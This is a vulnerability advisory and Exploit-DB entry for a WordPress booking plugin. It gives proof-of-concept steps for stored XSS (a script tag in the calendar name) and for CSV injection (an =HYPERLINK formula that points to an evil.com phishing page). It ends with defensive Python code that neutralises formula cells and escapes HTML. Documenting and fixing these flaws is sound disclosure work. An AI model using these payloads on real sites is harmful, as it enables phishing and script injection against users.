Vendor: Appointment Booking Calendar
By: Daniel Monzón (stark0de)
CVSS: 7.8 (HIGH)
Stored Cross-Site-Scripting and CSV Injection
CWE: 79
Product Name: Appointment Booking Calendar
Affected Version From: 1.3.34
Affected Version To: 1.3.34
Patch Exists: Yes
Related CVE: CVE-2020-9371, CVE-2020-9372
CPE: a:codepeople:appointment_booking_calendar
Other Scripts: N/A
Platforms Tested: Windows 7 x86 SP1
Year: 2020

WordPress Plugin Appointment Booking Calendar 1.3.34 – CSV Injection

A vulnerability exists in the WordPress plugin Appointment Booking Calendar 1.3.34 which allows an attacker to inject a spreadsheet formula into a booking field and have it exported in a CSV file, where it becomes a malicious hyperlink once the file is opened in a spreadsheet application. When the user clicks on the hyperlink, they are redirected to a fake login page.

Mitigation:

Update to the latest version of the plugin, or disable the plugin if it is not necessary.

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
# Google Dork: N/A
# Date: 2020-03-05
# Exploit Author: Daniel Monzón (stark0de)
# Vendor Homepage: https://www.codepeople.net/
# Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip
# Version: 1.3.34
# Tested on: Windows 7 x86 SP1
# CVE : CVE-2020-9371, CVE-2020-9372

----Stored Cross-Site-Scripting-------------------

1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php
2) Calendar Name=<script>alert(0)</script> and Update
3) Click on any of the other tabs

----CSV injection---------------------------------

1) First we create a new calendar (Pages, Add New, Booking Calendar) and publish it (we can now log out)
2) Then we go to the page and enter data, including the payload:

New booking:

Name: IMPORTANT DATA
Description: http://evil.com/evil.php

New booking:

Name: test
Description: =HYPERLINK(K2;H2)

This is the way it would work if I had a business registered and the payment was completed; it can also be done by adding the new bookings with the same data from the admin panel.

3) Then we go to Bookings List and export the CSV file
4) After that we open the file and import the data from an external file, using comma as the separator
5) The hyperlink to the malicious PHP file is inserted; when the user clicks on it, they are redirected to a fake login page (for example)

Tested on Windows 7 Pro SP1 32-bit, WordPress 5.3.2 and Excel 2016
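As an added defensive example (not code from the plugin or from the advisory author): a Python CSV exporter that neutralises formula-prefixed cells such as the `=HYPERLINK(K2;H2)` payload above before they reach a spreadsheet, a scanner that flags formula cells in an already-exported CSV, and the HTML escaping that the stored XSS finding calls for. The booking rows and field names are constructed here to mirror the advisory's test data.

```python
"""Defences for the CSV injection and stored XSS findings described above."""
import csv
import html
import io

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula.
FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value: str) -> str:
    """Prefix formula-looking cells with a single quote so they display as text."""
    if value.lstrip().startswith(FORMULA_PREFIXES):
        return "'" + value
    return value


def export_bookings_csv(rows, fieldnames):
    """Write booking rows to CSV text, neutralising every cell and quoting all fields."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=fieldnames, quoting=csv.QUOTE_ALL)
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(str(row.get(k, ""))) for k in fieldnames})
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Scan an exported CSV and return (row, column, cell) for cells that would run as formulas."""
    hits = []
    for row_no, row in enumerate(csv.reader(io.StringIO(csv_text)), start=1):
        for col_no, cell in enumerate(row, start=1):
            if cell.lstrip().startswith(FORMULA_PREFIXES) and not cell.startswith("'"):
                hits.append((row_no, col_no, cell))
    return hits


def escape_calendar_name(name: str) -> str:
    """HTML-escape a user-supplied calendar name before rendering it in the admin page."""
    return html.escape(name, quote=True)


# Constructed sample bookings mirroring the advisory's two test entries.
SAMPLE_BOOKINGS = [
    {"name": "IMPORTANT DATA", "description": "http://evil.com/evil.php"},
    {"name": "test", "description": "=HYPERLINK(K2;H2)"},
]

if __name__ == "__main__":
    exported = export_bookings_csv(SAMPLE_BOOKINGS, ["name", "description"])
    print(exported)
    print("formula cells remaining:", find_formula_cells(exported))
```

The `+` and `-` prefixes also catch legitimate negative numbers, so a real exporter may want to exempt cells that parse cleanly as numbers.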